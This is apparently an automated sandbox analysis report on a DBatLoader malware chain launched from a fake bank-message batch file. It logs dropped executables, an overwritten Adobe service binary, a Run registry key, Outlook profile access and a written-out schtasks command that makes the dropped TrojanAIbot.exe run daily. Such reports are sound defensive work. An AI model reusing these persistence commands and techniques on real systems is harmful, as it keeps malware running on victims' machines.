Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: apphelp.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: version.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: uxtheme.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: url.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: ieframe.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: iertutil.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: netapi32.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: userenv.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: winhttp.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: wkscli.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: netutils.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: amsi.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: sppc.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: apllllphllelp.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: winmm.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: wininet.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: sspicli.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: windows.storage.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: wldp.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: profapi.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: kernel.appcore.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: ieproxy.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: ieproxy.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: ieproxy.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: mswsock.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: mssip32.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: iphlpapi.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: mssip32.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: winnsi.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: mssip32.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: smartscreenps.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: smartscreenps.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: smartscreenps.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: ???.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: ???.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: ???.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: ??l.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: ??l.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: ?.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: ?.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: ??l.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: ????.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: ???e???????????.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: ???e???????????.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: ?.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: ?.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: ?.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: ?.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: ??l.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: ??l.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: tquery.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: cryptdll.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: spp.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: vssapi.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: vsstrace.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: spp.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: vssapi.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: vsstrace.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: mssip32.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: endpointdlp.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: endpointdlp.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: endpointdlp.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: endpointdlp.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: advapi.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: advapi.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: advapi.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: advapi.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: advapi.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: advapi.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: advapi.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: spp.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: vssapi.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: vsstrace.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: sppwmi.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: slc.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: sppcext.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: winscard.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: devobj.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: cryptsp.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: rsaenh.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: cryptbase.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Section loaded: winhttp.dll
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Section loaded: mpr.dll

Source: C:\Users\user\AppData\Local\Temp\x.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32

Jump to behavior

Source: TrojanAIbot.exe.lnk.14.dr

LNK file: ..\..\..\..\..\ACCApi\TrojanAIbot.exe

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles

Jump to behavior

Source: Ziraat_Bankasi_Swift_Mesaji_DXB04958T.bat

Static file information: File size 1057171 > 1048576

Source:	Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: x.exe, 00000004.00000002.1536799829.000000007EC67000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E2A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E327000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1476291402.000000007F120000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: easinvoker.pdb source: x.exe, x.exe, 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1526389874.00000000206E3000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1443292232.000000007FCE0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1536799829.000000007EC67000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1444132666.000000007FAD0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E2A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E327000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1526389874.0000000020787000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1476291402.000000007F120000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: cmd.pdbUGP source: esentutl.exe, 00000008.00000003.1493765037.00000000054E0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ping.pdbGCTL source: esentutl.exe, 00000009.00000003.1497786383.0000000004A20000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: easinvoker.pdbH source: x.exe, 00000004.00000002.1536799829.000000007EC67000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E2A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E327000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1476291402.000000007F120000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: easinvoker.pdbGCTL source: x.exe, 00000004.00000003.1497081210.0000000021C10000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000003.1497081210.0000000021C3F000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1526389874.00000000206E3000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1443906217.00000000027DB000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000003.1443292232.000000007FCE0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1444132666.000000007FAD0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1510941907.00000000027DD000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.1526389874.0000000020787000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: cmd.pdb source: esentutl.exe, 00000008.00000003.1493765037.00000000054E0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ping.pdb source: esentutl.exe, 00000009.00000003.1497786383.0000000004A20000.00000004.00001000.00020000.00000000.sdmp

Data Obfuscation

Yara detected DBatLoader

Source: Yara match	File source: 4.2.x.exe.2a00000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000003.1444132666.000000007FAD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Source: lxsyrsiW.pif.4.dr

Static PE information: 0x9E9038DB [Sun Apr 19 22:51:07 2054 UTC]

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 4_2_02A1894C LoadLibraryW,GetProcAddress,FreeLibrary,

4_2_02A1894C

Source: armsvc.exe.12.dr	Static PE information: real checksum: 0x32318 should be: 0x14596a
Source: neworigin.exe.12.dr	Static PE information: real checksum: 0x0 should be: 0x480db
Source: x.exe.3.dr	Static PE information: real checksum: 0x0 should be: 0x10eeb3
Source: server_BTC.exe.12.dr	Static PE information: real checksum: 0x0 should be: 0x42478
Source: lxsyrsiW.pif.4.dr	Static PE information: real checksum: 0x0 should be: 0x1768a
Source: Wisrysxl.PIF.10.dr	Static PE information: real checksum: 0x0 should be: 0x10eeb3
Source: TrojanAIbot.exe.14.dr	Static PE information: real checksum: 0x0 should be: 0x42478

Source: alpha.pif.8.dr	Static PE information: section name: .didat
Source: armsvc.exe.12.dr	Static PE information: section name: .didat

Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02A2D2FC push 02A2D367h; ret	4_2_02A2D35F
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02A063AE push 02A0640Bh; ret	4_2_02A06403
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02A063B0 push 02A0640Bh; ret	4_2_02A06403
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02A0332C push eax; ret	4_2_02A03368
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02A2C378 push 02A2C56Eh; ret	4_2_02A2C566
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02A0C349 push 8B02A0C1h; ret	4_2_02A0C34E
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02A2D0AC push 02A2D125h; ret	4_2_02A2D11D
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02A1306B push 02A130B9h; ret	4_2_02A130B1
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02A1306C push 02A130B9h; ret	4_2_02A130B1
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02A2D1F8 push 02A2D288h; ret	4_2_02A2D280
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02A1F108 push ecx; mov dword ptr [esp], edx	4_2_02A1F10D
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02A2D144 push 02A2D1ECh; ret	4_2_02A2D1E4
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02A06782 push 02A067C6h; ret	4_2_02A067BE
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02A06784 push 02A067C6h; ret	4_2_02A067BE
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02A0D5A0 push 02A0D5CCh; ret	4_2_02A0D5C4
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02A0C56C push ecx; mov dword ptr [esp], edx	4_2_02A0C571
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02A2C570 push 02A2C56Eh; ret	4_2_02A2C566
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02A1AAE0 push 02A1AB18h; ret	4_2_02A1AB10
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02A18AD8 push 02A18B10h; ret	4_2_02A18B08
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02A1AADF push 02A1AB18h; ret	4_2_02A1AB10
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02A0CA4E push 02A0CD72h; ret	4_2_02A0CD6A
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02A0CBEC push 02A0CD72h; ret	4_2_02A0CD6A
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02A1886C push 02A188AEh; ret	4_2_02A188A6
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02A74850 push eax; ret	4_2_02A74920
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02A1790C push 02A17989h; ret	4_2_02A17981
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02A16946 push 02A169F3h; ret	4_2_02A169EB
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02A16948 push 02A169F3h; ret	4_2_02A169EB
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02A15E7C push ecx; mov dword ptr [esp], edx	4_2_02A15E7E
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02A12F60 push 02A12FD6h; ret	4_2_02A12FCE
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 13_2_016B0C6D push edi; retf	13_2_016B0C7A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 15_2_04EB633D push eax; ret	15_2_04EB6351

Persistence and Installation Behavior

Drops PE files with a suspicious file extension

Source: C:\Windows\SysWOW64\esentutl.exe	File created: C:\Users\Public\Libraries\Wisrysxl.PIF	Jump to dropped file
Source: C:\Windows\SysWOW64\esentutl.exe	File created: C:\Users\Public\alpha.pif	Jump to dropped file
Source: C:\Windows\SysWOW64\esentutl.exe	File created: C:\Users\Public\xpha.pif	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\x.exe	File created: C:\Users\Public\Libraries\lxsyrsiW.pif	Jump to dropped file

Drops executable to a common third party application directory

Source: C:\Users\Public\Libraries\lxsyrsiW.pif	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior

Infects executable files (exe, dll, sys, html)

Source: C:\Users\Public\Libraries\lxsyrsiW.pif

System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

Jump to behavior

Source: C:\Windows\SysWOW64\esentutl.exe	File created: C:\Users\Public\Libraries\Wisrysxl.PIF	Jump to dropped file
Source: C:\Windows\SysWOW64\esentutl.exe	File created: C:\Users\Public\alpha.pif	Jump to dropped file
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	File created: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	File created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\esentutl.exe	File created: C:\Users\Public\xpha.pif	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\x.exe	File created: C:\Users\Public\Libraries\lxsyrsiW.pif	Jump to dropped file
Source: C:\Windows\System32\extrac32.exe	File created: C:\Users\user\AppData\Local\Temp\x.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	File created: C:\Users\user\AppData\Local\Temp\neworigin.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	File created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Jump to dropped file

Source: C:\Windows\SysWOW64\esentutl.exe	File created: C:\Users\Public\alpha.pif			Jump to dropped file
Source: C:\Windows\SysWOW64\esentutl.exe	File created: C:\Users\Public\xpha.pif			Jump to dropped file

Boot Survival

Drops PE files to the user root directory

Source: C:\Windows\SysWOW64\esentutl.exe	File created: C:\Users\Public\alpha.pif			Jump to dropped file
Source: C:\Windows\SysWOW64\esentutl.exe	File created: C:\Users\Public\xpha.pif			Jump to dropped file

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 12:07 /du 23:59 /sc daily /ri 1 /f

Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TrojanAIbot.exe.lnk

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TrojanAIbot.exe.lnk

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\x.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Wisrysxl			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Wisrysxl			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 4_2_02A1AB1C GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

4_2_02A1AB1C

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot	Jump to behavior
